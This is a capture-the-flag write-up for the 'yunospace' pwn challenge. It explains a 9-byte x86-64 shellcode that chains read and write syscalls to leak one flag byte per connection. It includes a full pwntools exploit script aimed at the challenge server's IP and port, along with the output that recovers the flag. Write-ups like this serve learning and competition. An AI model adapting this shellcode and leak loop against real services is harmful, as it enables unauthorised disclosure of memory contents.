### === yunospace (Pwn: 47 solves, 153 pts) ===
by mito

I use the following 9 bytes Shellcode("\x54\xb2\x51\x5e\x0f\x05\x5f\xeb\xf9").
```
buf = asm("""
push rsp
pos:
mov dl,0x51
pop rsi
syscall
pop rdi
jmp pos+1
""")
```

This code is executed as shown below.
```
(1) push rsp
(2) mov dl, 0x51 # set rdx = 0x51 and 0x51("push rcx") will be used later.
(3) pop rsi # set rsi = rsp
(4) syscall # read(0, rsp, 0x51) and 1 byte(0x01) read, then set rax = 0x1, *rsp = 0x1, set rcx = rip
(5) pop rdi # set rdi = 0x1
(6) jmp 0xf9 # jump position of "0x51"
(7) push rcx
(8) pop rsi # set rsi = rcx
(9) syscall # write(1, rcx, 0x51)
```

Exploit code is the following.
```
from pwn import *

context(os='linux', arch='amd64')
#context.log_level = 'debug'

BINARY = './yunospace'

flag = ""

for i in range(0,70):
if len(sys.argv) > 1 and sys.argv[1] == 'r':
HOST = "195.201.127.119"
PORT = 8664
s = remote(HOST, PORT)
else:
s = process(["/usr/bin/python", "wrapper.py"])

s.recvuntil("> Welcome. Which byte should we prepare for you today?\n")
s.sendline(str(i))
s.recvuntil("> Ok. Now your shellcode, please.\n")

buf = asm("""
push rsp
pos:
mov dl,0x51
pop rsi
syscall
pop rdi
jmp pos+1
""")
s.send(buf)

buf = "\x01" # set rdi = 0x01
s.send(buf)

r = s.recv(4)
flag += r[3]
print "flag =", flag

s.close()
```

Execution result
```
# python exploit.py r
[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = h
[*] Closed connection to 195.201.127.119 port 8664
[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = hx
...

[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng
[*] Closed connection to 195.201.127.119 port 8664
[+] Opening connection to 195.201.127.119 on port 8664: Done
flag = hxp{y0u_w0uldnt_b3l13v3_h0w_m4ny_3mulat0rs_g0t_th1s_wr0ng}
```